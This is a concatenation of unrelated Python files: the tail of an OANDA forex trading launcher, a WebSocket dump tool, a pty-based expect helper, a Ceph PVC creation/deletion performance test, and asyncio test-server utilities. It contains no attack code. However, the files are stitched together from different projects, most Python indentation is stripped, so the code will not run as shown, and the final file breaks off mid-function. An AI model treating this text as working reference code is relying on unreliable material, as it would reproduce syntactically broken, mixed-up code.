OANDA_STREAM_DOMAIN, settings.OANDA_ACCESS_TOKEN,
settings.OANDA_ACCOUNT_ID, pairs, events
)
# Create the strategy/signal generator, passing the
# instrument and the events queue
strategy = TestStrategy(pairs, events)
# Create the portfolio object that will be used to
# compare the OANDA positions with the local, to
# ensure backtesting integrity.
portfolio = Portfolio(
prices, events, equity=equity, backtest=False
)
# Create the execution handler making sure to
# provide authentication commands
execution = OANDAExecutionHandler(
OANDA_API_DOMAIN,
settings.ACCESS_TOKEN,
settings.ACCOUNT_ID
)
# Create two separate threads: One for the trading loop
# and another for the market price streaming class
trade_thread = threading.Thread(
target=trade, args=(
events, strategy, portfolio, execution, heartbeat
)
)
price_thread = threading.Thread(target=prices.stream_to_queue, args=[])
# Start both threads
logger.info("Starting trading thread")
trade_thread.start()
logger.info("Starting price streaming thread")
price_thread.start()
|
wsdump.py
|
#!/Users/Nish/Dropbox/SlackBot-SS/starterbot/bin/python2.7
import argparse
import code
import sys
import threading
import time
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": websocket.ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
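# Example invocations (URLs and header values are placeholders):
#
#   python wsdump.py ws://echo.websocket.org/ -t "hello" --timings
#   python wsdump.py wss://example.com/feed -vv --headers "X-Token: abc, Origin: http://localhost"
#   python wsdump.py ws://127.0.0.1:8000/ -p http://127.0.0.1:8080 -n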
|
uexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pty
import time
import sys
import re
from threading import Thread, Event
from subprocess import Popen
from queue import Queue, Empty
class TimeoutError(Exception):
def __init__(self, timeout):
self.timeout = timeout
def __str__(self):
return 'Timeout %.3fs' % float(self.timeout)
class ExpectTimeoutError(Exception):
def __init__(self, pattern, timeout, buffer):
self.pattern = pattern
self.timeout = timeout
self.buffer = buffer
def __str__(self):
s = 'Timeout %.3fs ' % float(self.timeout)
if self.pattern:
s += 'for %s ' % repr(self.pattern.pattern)
if self.buffer:
s += 'buffer %s' % repr(self.buffer[:])
#s += ' or \'%s\'' % ','.join(['%x' % ord(c) for c in self.buffer[:]])
return s
class IO(object):
class EOF(object):
pass
class Timeout(object):
pass
EOF = EOF
TIMEOUT = Timeout
class Logger(object):
def __init__(self, logger, prefix=''):
self._logger = logger
self._prefix = prefix
def write(self, data):
self._logger.write(('\n' + data).replace('\n','\n' + self._prefix))
def flush(self):
self._logger.flush()
def __init__(self, process, master, queue, reader):
self.process = process
self.master = master
self.queue = queue
self.buffer = None
self.before = None
self.after = None
self.match = None
self.pattern = None
self.reader = reader
self._timeout = None
self._logger = None
self._eol = ''
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def logger(self, logger=None, prefix=''):
if logger:
self._logger = self.Logger(logger, prefix=prefix)
return self._logger
def timeout(self, timeout=None):
if timeout:
self._timeout = timeout
return self._timeout
def eol(self, eol=None):
if eol:
self._eol = eol
return self._eol
def close(self, force=True):
self.reader['kill_event'].set()
os.system('pkill -TERM -P %d' % self.process.pid)
if force:
self.process.kill()
else:
self.process.terminate()
os.close(self.master)
if self._logger:
self._logger.write('\n')
self._logger.flush()
def send(self, data, eol=None):
if eol is None:
eol = self._eol
return self.write(data + eol)
def write(self, data):
return os.write(self.master, data.encode())
def expect(self, pattern, timeout=None, escape=False):
self.match = None
self.before = None
self.after = None
if escape:
pattern = re.escape(pattern)
pattern = re.compile(pattern)
if timeout is None:
timeout = self._timeout
timeleft = timeout
while True:
start_time = time.time()
if self.buffer is not None:
self.match = pattern.search(self.buffer, 0)
if self.match is not None:
self.after = self.buffer[self.match.start():self.match.end()]
self.before = self.buffer[:self.match.start()]
self.buffer = self.buffer[self.match.end():]
break
if timeleft < 0:
break
try:
data = self.read(timeout=timeleft, raise_exception=True)
except TimeoutError:
if self._logger:
self._logger.write((self.buffer or '') + '\n')
self._logger.flush()
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
timeleft -= (time.time() - start_time)
if data:
self.buffer = (self.buffer + data) if self.buffer else data
if self._logger:
self._logger.write((self.before or '') + (self.after or ''))
self._logger.flush()
if self.match is None:
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
return self.match
def read(self, timeout=0, raise_exception=False):
data = ''
timeleft = timeout
try:
while timeleft >= 0:
start_time = time.time()
data += self.queue.get(timeout=timeleft)
if data:
break
timeleft -= (time.time() - start_time)
except Empty:
if data:
return data
if raise_exception:
raise TimeoutError(timeout)
pass
if not data and raise_exception:
raise TimeoutError(timeout)
return data
def spawn(command):
master, slave = pty.openpty()
process = Popen(command, preexec_fn=os.setsid, stdout=slave, stdin=slave, stderr=slave, bufsize=1)
os.close(slave)
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(process, master, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(process, master, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
def reader(process, out, queue, kill_event):
while True:
try:
data = os.read(out, 65536).decode(errors='replace')
queue.put(data)
except:
if kill_event.is_set():
break
raise
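# Illustrative usage sketch (assumptions: a POSIX system with /bin/bash; the
# command, pattern, and timeout below are examples, not part of this module).
if __name__ == '__main__':
    io = spawn(['/bin/bash', '--noprofile', '--norc'])
    io.timeout(5)   # seconds expect()/read() will wait for output
    io.eol('\n')    # line terminator appended by send()
    try:
        io.send('echo uexpect-demo')
        io.expect('uexpect-demo')   # raises ExpectTimeoutError if not seen
        print('matched:', repr(io.after))
    finally:
        io.close()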
|
test_pvc_creation_deletion_performance.py
|
"""
Test to verify performance of PVC creation and deletion
for RBD, CephFS and RBD-Thick interfaces
"""
import time
import logging
import datetime
import pytest
import ocs_ci.ocs.exceptions as ex
import threading
import statistics
from concurrent.futures import ThreadPoolExecutor
from uuid import uuid4
from ocs_ci.framework.testlib import performance
from ocs_ci.ocs.perftests import PASTest
from ocs_ci.helpers import helpers, performance_lib
from ocs_ci.ocs import constants
from ocs_ci.utility.performance_dashboard import push_to_pvc_time_dashboard
from ocs_ci.helpers.helpers import get_full_test_logs_path
from ocs_ci.ocs.perfresult import PerfResult
from ocs_ci.framework import config
log = logging.getLogger(__name__)
class ResultsAnalyse(PerfResult):
"""
This class generates results for all tests as one unit
and saves them to an elastic search server on the cluster
"""
def __init__(self, uuid, crd, full_log_path):
"""
Initialize the object by reading some of the data from the CRD file and
by connecting to the ES server and read all results from it.
Args:
uuid (str): the unique uid of the test
crd (dict): dictionary with test parameters - the test yaml file
that modify it in the test itself.
full_log_path (str): the path of the results files to be found
"""
super(ResultsAnalyse, self).__init__(uuid, crd)
self.new_index = "pvc_create_delete_fullres"
self.full_log_path = full_log_path
# make sure we have connection to the elastic search server
self.es_connect()
@performance
class TestPVCCreationDeletionPerformance(PASTest):
"""
Test to verify performance of PVC creation and deletion
"""
def setup(self):
"""
Setting up test parameters
"""
log.info("Starting the test setup")
super(TestPVCCreationDeletionPerformance, self).setup()
self.benchmark_name = "PVC_Creation-Deletion"
self.uuid = uuid4().hex
self.crd_data = {
"spec": {
"test_user": "Homer simpson",
"clustername": "test_cluster",
"elasticsearch": {
"server": config.PERF.get("production_es_server"),
"port": config.PERF.get("production_es_port"),
"url": f"http://{config.PERF.get('production_es_server')}:{config.PERF.get('production_es_port')}",
},
}
}
if self.dev_mode:
self.crd_data["spec"]["elasticsearch"] = {
"server": config.PERF.get("dev_es_server"),
"port": config.PERF.get("dev_es_port"),
"url": f"http://{config.PERF.get('dev_es_server')}:{config.PERF.get('dev_es_port')}",
}
@pytest.fixture()
def base_setup(self, interface_type, storageclass_factory, pod_factory):
"""
A setup phase for the test
Args:
interface_type: A fixture to iterate over ceph interfaces
storageclass_factory: A fixture to create everything needed for a
storageclass
pod_factory: A fixture to create new pod
"""
self.interface = interface_type
if self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc_obj = storageclass_factory(
interface=constants.CEPHBLOCKPOOL,
new_rbd_pool=True,
rbd_thick_provision=True,
)
else:
self.sc_obj = storageclass_factory(self.interface)
self.pod_factory = pod_factory
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a new project
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
def init_full_results(self, full_results):
"""
Initialize the full results object which will send to the ES server
Args:
full_results (obj): an empty FIOResultsAnalyse object
Returns:
FIOResultsAnalyse (obj): the input object fill with data
"""
for key in self.environment:
full_results.add_key(key, self.environment[key])
full_results.add_key("storageclass", self.sc)
full_results.add_key("index", full_results.new_index)
return full_results
@pytest.mark.parametrize(
argnames=["interface_type", "pvc_size"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "5Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "15Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "25Gi"],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
def test_pvc_creation_deletion_measurement_performance(
self, teardown_factory, pvc_size
):
"""
Measuring PVC creation and deletion times for pvc samples
Verifying that those times are within the required limits
"""
# Getting the full path for the test logs
self.full_log_path = get_full_test_logs_path(cname=self)
if self.interface == constants.CEPHBLOCKPOOL:
self.sc = "RBD"
elif self.interface == constants.CEPHFILESYSTEM:
self.sc = "CephFS"
elif self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc = "RBD-Thick"
self.full_log_path += f"-{self.sc}-{pvc_size}"
log.info(f"Logs file path name is : {self.full_log_path}")
self.start_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.get_env_info()
# Initialize the results doc file.
self.full_results = self.init_full_results(
ResultsAnalyse(self.uuid, self.crd_data, self.full_log_path)
)
self.full_results.add_key("pvc_size", pvc_size)
num_of_samples = 5
accepted_creation_time = (
600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 1
)
# accepted deletion time for RBD is 1 sec, for CephFS is 2 secs and for RBD Thick is 5 secs
if self.interface == constants.CEPHFILESYSTEM:
accepted_deletion_time = 2
elif self.interface == constants.CEPHBLOCKPOOL:
accepted_deletion_time = 1
else:
accepted_deletion_time = 5
self.full_results.add_key("samples", num_of_samples)
accepted_creation_deviation_percent = 50
accepted_deletion_deviation_percent = 50
creation_time_measures = []
deletion_time_measures = []
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
for i in range(num_of_samples):
logging.info(f"{msg_prefix} Start creating PVC number {i + 1}.")
start_time = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
pvc_obj = helpers.create_pvc(sc_name=self.sc_obj.name, size=pvc_size)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
helpers.wait_for_resource_state(
pvc_obj, constants.STATUS_BOUND, timeout=timeout
)
pvc_obj.reload()
creation_time = performance_lib.measure_pvc_creation_time(
self.interface, pvc_obj.name, start_time
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was created in {creation_time} seconds."
)
if creation_time > accepted_creation_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC creation time is {creation_time} and is greater than "
f"{accepted_creation_time} seconds."
)
creation_time_measures.append(creation_time)
pv_name = pvc_obj.backed_pv
pvc_reclaim_policy = pvc_obj.reclaim_policy
pod_obj = self.write_file_on_pvc(pvc_obj)
pod_obj.delete(wait=True)
teardown_factory(pvc_obj)
logging.info(f"{msg_prefix} Start deleting PVC number {i + 1}")
if pvc_reclaim_policy == constants.RECLAIM_POLICY_DELETE:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
helpers.validate_pv_delete(pvc_obj.backed_pv)
deletion_time = helpers.measure_pvc_deletion_time(
self.interface, pv_name
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was deleted in {deletion_time} seconds."
)
if deletion_time > accepted_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC deletion time is {deletion_time} and is greater than "
f"{accepted_deletion_time} seconds."
)
deletion_time_measures.append(deletion_time)
else:
logging.info(
f"Reclaim policy of the PVC {pvc_obj.name} is not Delete;"
f" therefore not measuring deletion time for this PVC."
)
creation_average = self.process_time_measurements(
"creation",
creation_time_measures,
accepted_creation_deviation_percent,
msg_prefix,
)
self.full_results.add_key("creation-time", creation_average)
deletion_average = self.process_time_measurements(
"deletion",
deletion_time_measures,
accepted_deletion_deviation_percent,
msg_prefix,
)
self.full_results.add_key("deletion-time", deletion_average)
self.full_results.all_results["creation"] = creation_time_measures
self.full_results.all_results["deletion"] = deletion_time_measures
self.end_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.full_results.add_key(
"test_time", {"start": self.start_time, "end": self.end_time}
)
self.full_results.es_write()
log.info(f"The Result can be found at : {self.full_results.results_link()}")
if not self.dev_mode:
# all the results are OK, the test passes, push the results to the codespeed
push_to_pvc_time_dashboard(
self.interface, "1-pvc-creation", creation_average
)
push_to_pvc_time_dashboard(
self.interface, "1-pvc-deletion", deletion_average
)
def process_time_measurements(
self, action_name, time_measures, accepted_deviation_percent, msg_prefix
):
"""
Analyses the given time measured. If the standard deviation of these times is bigger than the
provided accepted deviation percent, fails the test
Args:
action_name (str): Name of the action for which these measurements were collected; used for the logging
time_measures (list of floats): A list of time measurements
accepted_deviation_percent (int): Accepted deviation percent to which computed standard deviation may be
compared
msg_prefix (str) : A string for comprehensive logging
Returns:
(float) The average value of the provided time measurements
"""
average = statistics.mean(time_measures)
log.info(
f"{msg_prefix} The average {action_name} time for the sampled {len(time_measures)} "
f"PVCs is {average} seconds."
)
if self.interface == constants.CEPHBLOCKPOOL_THICK:
st_deviation = statistics.stdev(time_measures)
st_deviation_percent = st_deviation / average * 100.0
if st_deviation_percent > accepted_deviation_percent:
log.error(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% which is bigger than accepted {accepted_deviation_percent}."
)
else:
log.info(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% and is within the accepted range."
)
self.full_results.add_key(
f"{action_name}_deviation_pct", st_deviation_percent
)
return average
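# Worked example (illustrative numbers only): for time_measures = [10.0, 12.0, 14.0]
# the mean is 12.0 s and statistics.stdev() returns 2.0 s, so the deviation percent
# is 2.0 / 12.0 * 100 ~= 16.7%, well within a 50% accepted_deviation_percent.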
def write_file_on_pvc(self, pvc_obj, filesize=1):
"""
Writes a file on given PVC
Args:
pvc_obj: PVC object to write a file on
filesize: size of file to write (in GB - default is 1GB)
Returns:
Pod on this pvc on which the file was written
"""
pod_obj = self.pod_factory(
interface=self.interface, pvc=pvc_obj, status=constants.STATUS_RUNNING
)
# Convert the requested file size (GB) into the megabyte string expected by fillup_fs
file_size = f"{int(filesize * 1024)}M"
log.info(f"Starting IO on the POD {pod_obj.name}")
# Going to run only write IO
pod_obj.fillup_fs(size=file_size, fio_filename=f"{pod_obj.name}_file")
# Wait for the fio to finish
fio_result = pod_obj.get_fio_results()
err_count = fio_result.get("jobs")[0].get("error")
assert (
err_count == 0
), f"IO error on pod {pod_obj.name}. FIO result: {fio_result}"
log.info("IO on the PVC has finished")
return pod_obj
@pytest.mark.parametrize(
argnames=["interface_type"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
@pytest.mark.usefixtures(namespace.__name__)
@pytest.mark.polarion_id("OCS-2618")
def test_multiple_pvc_deletion_measurement_performance(self, teardown_factory):
"""
Measuring PVC deletion time of 120 PVCs in 180 seconds
Args:
teardown_factory: A fixture used when we want a new resource that was created during the tests
to be removed in the teardown phase.
Returns:
"""
number_of_pvcs = 120
pvc_size = "1Gi"
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
log.info(f"{msg_prefix} Start creating new 120 PVCs")
pvc_objs = helpers.create_multiple_pvcs(
sc_name=self.sc_obj.name,
namespace=self.namespace,
number_of_pvc=number_of_pvcs,
size=pvc_size,
burst=True,
)
for pvc_obj in pvc_objs:
pvc_obj.reload()
teardown_factory(pvc_obj)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
with ThreadPoolExecutor(max_workers=5) as executor:
for pvc_obj in pvc_objs:
executor.submit(
helpers.wait_for_resource_state,
pvc_obj,
constants.STATUS_BOUND,
timeout=timeout,
)
executor.submit(pvc_obj.reload)
pod_objs = []
for pvc_obj in pvc_objs:
pod_obj = self.write_file_on_pvc(pvc_obj, 0.3)
pod_objs.append(pod_obj)
        # Collect the PVC and PV names; the PV names are required to fetch deletion time data from the logs
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
            # Pass the callable and its argument separately so append() runs in the thread
            process1 = threading.Thread(target=pvc_name_list.append, args=(pvc_obj.name,))
            process2 = threading.Thread(target=pv_name_list.append, args=(pvc_obj.backed_pv,))
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
log.info(f"{msg_prefix} Preparing to delete 120 PVC")
# Delete PVC
for pvc_obj, pod_obj in zip(pvc_objs, pod_objs):
pod_obj.delete(wait=True)
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=self.interface, pv_name_list=pv_name_list
)
log.info(
f"{msg_prefix} {number_of_pvcs} bulk deletion time is {pvc_deletion_time}"
)
# accepted deletion time is 2 secs for each PVC
accepted_pvc_deletion_time = number_of_pvcs * 2
for del_time in pvc_deletion_time.values():
if del_time > accepted_pvc_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} {number_of_pvcs} PVCs deletion time is {pvc_deletion_time.values()} and is "
f"greater than {accepted_pvc_deletion_time} seconds"
)
logging.info(f"{msg_prefix} {number_of_pvcs} PVCs deletion times are:")
for name, a_time in pvc_deletion_time.items():
logging.info(f"{name} deletion time is: {a_time} seconds")
|
utils.py
|
"""Utilities shared by tests."""
import asyncio
import collections
import contextlib
import io
import logging
import os
import re
import selectors
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from asyncio import base_events
from asyncio import events
from asyncio import format_helpers
from asyncio import futures
from asyncio import tasks
from asyncio.log import logger
from test import support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), '..', filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
def simple_server_sslcontext():
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
return server_context
def simple_client_sslcontext(*, disable_verify=True):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.check_hostname = False
if disable_verify:
client_context.verify_mode = ssl.CERT_NONE
return client_context
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
async def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=support.SHORT_TIMEOUT):
deadline = time.monotonic() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.monotonic()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
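# Illustrative sketch (not part of the original helpers): run_once() queues a
# loop.stop() callback and runs the loop, so any callback scheduled beforehand
# is executed exactly once. The function name, list and message below are made
# up for the example.
def _example_run_once():
    loop = asyncio.new_event_loop()
    try:
        hits = []
        loop.call_soon(hits.append, 'polled')
        run_once(loop)
        assert hits == ['polled']
    finally:
        loop.close()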
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = support.LOOPBACK_TIMEOUT
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
context = ssl.SSLContext()
context.load_cert_chain(ONLYCERT, ONLYKEY)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def loop(environ):
size = int(environ['CONTENT_LENGTH'])
while size:
data = environ['wsgi.input'].read(min(size, 0x10000))
yield data
size -= len(data)
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
if environ['PATH_INFO'] == '/loop':
return loop(environ)
else:
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = support.LOOPBACK_TIMEOUT
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
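# Illustrative sketch (not part of the original helpers): run_test_server()
# yields a silent WSGI server bound to an ephemeral port; any path other than
# /loop answers with b'Test message'. The function name and client code below
# are made up for the example.
def _example_run_test_server():
    import http.client

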